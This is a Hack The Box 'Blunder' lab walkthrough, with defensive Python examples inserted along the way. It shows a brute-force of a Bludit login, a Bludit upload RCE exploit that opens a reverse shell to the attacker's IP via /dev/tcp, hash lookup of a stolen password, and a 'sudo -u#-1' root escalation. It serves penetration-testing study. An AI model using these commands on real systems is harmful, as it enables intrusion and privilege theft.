Hack The Box: Blunder Walkthrough

Hi Folks. This is my first HTB writeup so let me know what you think.

For anyone who doesn’t know, Hack The Box is an online platform designed for security researchers and penetration testers to test their skills against a range of life-like labs. The main area consists of different ‘boxes’, which are essentially systems you can try to hack into. The main objective when completing each box is to bypass the security mechanisms in order to capture two ‘flags’, each of which is a coded string inside a text file. The first flag is the easier of the two, as the hacker only needs user privileges on the server to read the file; accessing the second flag, however, requires root privileges, which are the highest level of privilege available on a system. After capturing the root flag you have ‘owned’ the box, which is what I’m going to walk through today.

Reconnaissance

First, run an Nmap scan. Nmap is always the place to start when doing reconnaissance.

$ nmap -sV -sC -Pn 10.10.10.191

[Image: Nmap scan results]

So there is an FTP port, but it is closed, so it is not useful to us. Port 80 is open though, so there is probably a website hosted on this server.

[Image: Home page of 10.10.10.191]

There is indeed a website. As I navigate the site in Firefox I see that the site seems to just consist of two HTML pages; nothing of interest. Time to look for hidden content. I decide to use dirsearch to enumerate hidden files on the webpage.

$ python3 dirsearch.py -u 10.10.10.191 -e *

dirsearch revealed some hidden pages such as an admin page.

[Image: admin page]

A quick search for ‘Bludit’ reveals it to be a CMS (Content Management System), which I note down. I spent some time investigating this page with Burp to see how the page works, and used ZAP to look for potential flaws in the login page. No luck. Back to the drawing board: I decide to continue looking for hidden content by fuzzing the site for files with different extensions. When searching for text files, I hit pay dirt.

$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100

[Image: Wfuzz results]

The fuzzing revealed a “todo” text file. Inside it was some promising info.

-Update the CMS

-Turn off FTP — DONE

-Remove old users — DONE

-Inform fergus that the new blog needs images — PENDING

Foothold

While this may not seem like much information, I realised that fergus could well be a valid username for the admin login page, which is half the puzzle. Time to get a password. I use CeWL to scrape the website for words and build a wordlist to attack the login page.

$ cewl -w wordlists.txt -d 10 -m 1 http://10.10.10.191/

I then did some research into ‘Bludit’ login forms and potential exploits. With the help of a github.io post (https://rastating.github.io/bludit-brute-force-mitigation-bypass/), I built a brute-force program in Python. I hope to put this program on GitHub when I have time.

$ python3 brute.py

[*] Trying: fictional

[*] Trying: character

[*] Trying: RolandDeschain

SUCCESS: Password found!

Use fergus:RolandDeschain to login.

Success! CeWL managed to create an exhaustive wordlist, and with the username fergus I crack the form. I can now log in.
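As an added defender-side example (not the author’s brute.py and not Bludit code), here is a small Python detector run over constructed web-server log lines for the pattern above: many POSTs to the login form in a short window, plus many distinct X-Forwarded-For values from one connecting address, which is the header-spoofing trick the linked bypass post relies on. The log format with a trailing X-Forwarded-For field and the /admin/login path are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines (not from the box): Apache-style log, X-Forwarded-For appended last.
SAMPLE_LOG = """\
10.10.15.100 - - [09/Jul/2020:14:01:02 +0000] "POST /admin/login HTTP/1.1" 200 512 "-" "python-requests/2.23" "192.0.2.1"
10.10.15.100 - - [09/Jul/2020:14:01:03 +0000] "POST /admin/login HTTP/1.1" 200 512 "-" "python-requests/2.23" "192.0.2.2"
10.10.15.100 - - [09/Jul/2020:14:01:03 +0000] "POST /admin/login HTTP/1.1" 200 512 "-" "python-requests/2.23" "192.0.2.3"
10.10.15.100 - - [09/Jul/2020:14:01:04 +0000] "POST /admin/login HTTP/1.1" 302 0 "-" "python-requests/2.23" "192.0.2.4"
203.0.113.9 - - [09/Jul/2020:14:05:20 +0000] "POST /admin/login HTTP/1.1" 302 0 "-" "Mozilla/5.0" "-"
"""
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<xff>[^"]*)"$')
LOGIN_PATH = "/admin/login"   # assumed Bludit admin login endpoint

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None           # line is not in the expected format
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def find_bruteforce(log_text, window_s=60, max_attempts=4, max_xff=3):
    """Return {source_ip: reason} for clients hammering the login form: many login
    POSTs in one window, or many distinct X-Forwarded-For values from one address
    (the signature of a lockout keyed on that header being spoofed around)."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec and rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            by_ip[rec["ip"]].append(rec)
    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        reasons, start, best = [], 0, 0
        for end in range(len(recs)):          # sliding window over sorted times
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= max_attempts:
            reasons.append(f"{best} login POSTs within {window_s}s")
        xff = {r["xff"] for r in recs if r["xff"] not in ("", "-")}
        if len(xff) >= max_xff:
            reasons.append(f"{len(xff)} distinct X-Forwarded-For values")
        if reasons:
            flagged[ip] = "; ".join(reasons)
    return flagged
```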

Now that I have access to the backend of the system, I resist the urge to deface the webpage with a video montage of cats doing evil things; instead, I research the open-source Bludit CMS. Vulmon had a good page detailing an RCE (Remote Code Execution) vulnerability, CVE-2019-16113:

Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.
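Added example, not Bludit’s code: the class of bug described above (a PHP payload accepted because of its file name, then written under a caller-chosen ‘../’ path) is what an image upload handler’s validation has to stop. This illustrative Python version checks the destination directory against the upload root, the file name, the image magic bytes, and the presence of PHP open tags; the upload root path is an assumption.

```python
import os
import re

# Leading bytes a genuine image of each type must carry.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",), ".gif": (b"GIF87a", b"GIF89a"),
}
PHP_TAG = re.compile(rb"<\?(php\b|=|\s)", re.I)

def safe_destination(base_dir, subdir):
    """Resolve base_dir/subdir and refuse any value that escapes base_dir,
    so a caller-supplied directory name cannot contain a working '../'."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, subdir))
    if target != base and not target.startswith(base + os.sep):
        raise ValueError("destination escapes the upload root")
    return target

def validate_image_upload(filename, content):
    """Return the normalised extension of an acceptable image, else raise ValueError.
    The name must be a plain file name with a single image extension (so
    'x.php.jpg' and dotfiles are refused), and the bytes must look like that
    image type and contain no PHP open tag."""
    name = os.path.basename(filename)
    if name != filename or name.startswith("."):
        raise ValueError("unsafe file name")
    stem, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in IMAGE_MAGIC or "." in stem:
        raise ValueError(f"extension not allowed: {name}")
    if not any(content.startswith(magic) for magic in IMAGE_MAGIC[ext]):
        raise ValueError("content does not match the declared image type")
    if PHP_TAG.search(content):
        raise ValueError("PHP open tag inside image data")
    return ext

def is_rejected(check, *args):
    """True when check(*args) raises ValueError; a helper for quick self-tests."""
    try:
        check(*args)
    except ValueError:
        return True
    return False
```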

Exploitation

I look at how CVE-2019-16113 may be useful to me in this situation. I found a Metasploit module for the CVE, but I could not configure it in a way that produced a shell; maybe the system has auto-updated, I’m not sure. After a long look through the internet I was close to writing my own exploit, but then I came across this Python script, which should do exactly what I want.

I set up my netcat listener:

$ nc -lvnp 4444

Time to run the exploit:

$ sudo python3 CVE-2019-16113.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "bash -c 'bash -i >& /dev/tcp/10.10.15.100/4444 0>&1'"

Jackpot! The reverse connection has been made and I have a shell on the remote server. Time to hunt for the user flag. I run a command and find I am the user ‘www-data’.

$ whoami

whoami

www-data

To be safe, I run a Python command to upgrade to a proper interactive shell.

$ python -c "import pty; pty.spawn('/bin/bash')"

</tmp$ python -c "import pty; pty.spawn('/bin/bash')"

Privilege Escalation

After some traversal, I find a users.php file in the databases folder of a different Bludit version (3.10.0a). Perhaps the passwords of these users will be weaker, as this copy is not public-facing. I read the file and find some interesting information.

$ cat users.php

The file shows a user called ‘Hugo’ and a hashed password. Back on my own terminal, I run the hashid command to identify the password hash. The hash is SHA-1. SHA-1 is a strong hashing algorithm and I know that using my own wordlists could take forever to find a match; instead, I can work in reverse. Due to the nature of hashing algorithms, a phrase passed through the algorithm will always produce the same digest, meaning that if this user has chosen a weak password, someone may already have discovered the plaintext for this hash. I head over to https://crackstation.net/ and look it up.

So we now have the full login of a user in the admin group. Time to elevate my privileges.

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo

su hugo

Password: Password120

hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$

I navigate to Hugo’s home directory and find the user.txt flag.

hugo@blunder:~$ cat user.txt

cat user.txt

e93f14a328725b131590e155b30e318b

Achieving Root

I run a cheeky one-liner in the hope of getting a sneaky root, but no luck. Instead, running sudo -l reveals something interesting:

User hugo may run the following commands on blunder:

(ALL, !root) /bin/bash

I research this output for clues and find a way to abuse this permission, which gives me the root access I was looking for.

hugo@blunder:~$ sudo -u#-1 /bin/bash

sudo -u#-1 /bin/bash

Password: Password120

root@blunder:/home/hugo#
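Added example, not from the walkthrough: a small Python audit over a constructed sudoers fragment that flags the pattern shown above, a Runas list that grants ALL and then tries to carve root back out with ‘!root’, plus rules that hand out a shell. Sudo itself has to enforce such an exclusion at run time, which is why an explicit list of permitted accounts is the safer form. The sudoers lines other than hugo’s are made up.

```python
import re

# Constructed sudoers fragment (not the box's file); the hugo line mirrors the sudo -l output.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
hugo    ALL=(ALL, !root) /bin/bash
backup  ALL=(www-data) NOPASSWD: /usr/bin/rsync   # fine: one named target account
deploy  ALL=(ALL, !root, !postgres) /usr/bin/systemctl restart app
"""
SPEC_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh", "/usr/bin/bash"}

def parse_sudoers(text):
    """Yield (user, runas_users, commands) for each user specification line."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments
        m = SPEC_RE.match(line)
        if not m:
            continue                               # Defaults, aliases, blank lines
        runas_users = m.group("runas").split(":", 1)[0]   # ignore the runas group part
        runas = [u.strip() for u in runas_users.split(",") if u.strip()]
        yield m.group("user"), runas, m.group("cmds").strip()

def audit(text):
    """Return one finding per risky rule: a Runas list that grants ALL and relies on
    '!' exclusions (a deny-list sudo must enforce), and commands that are shells."""
    findings = []
    for user, runas, cmds in parse_sudoers(text):
        excluded = [u for u in runas if u.startswith("!")]
        if "ALL" in runas and excluded:
            findings.append(f"{user}: runas (ALL, {', '.join(excluded)}) relies on exclusion; "
                            "list the permitted accounts explicitly instead")
        cmd = cmds.split(":")[-1].strip().split()  # strip tags such as NOPASSWD:
        if cmd and cmd[0] in SHELLS:
            findings.append(f"{user}: may run a shell ({cmd[0]}) via sudo")
    return findings
```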

All that is left to do is navigate to the root directory and grab the flag.

root@blunder:/root# cat root.txt

cat root.txt

ae6009c1e4eb4123d5221d1d15439f71

Box Owned.

This was a fairly easy box, but I found it very interesting and enjoyed pitting myself against it. If you got this far, thanks for reading. Let me know if there is anything you think I should do differently next time in terms of formatting of pictures or code extracts, or even structure.

Signing off,

Ben

sharkmoos: Novice Cyber Security Enthusiast. I like sharing what I’ve learnt.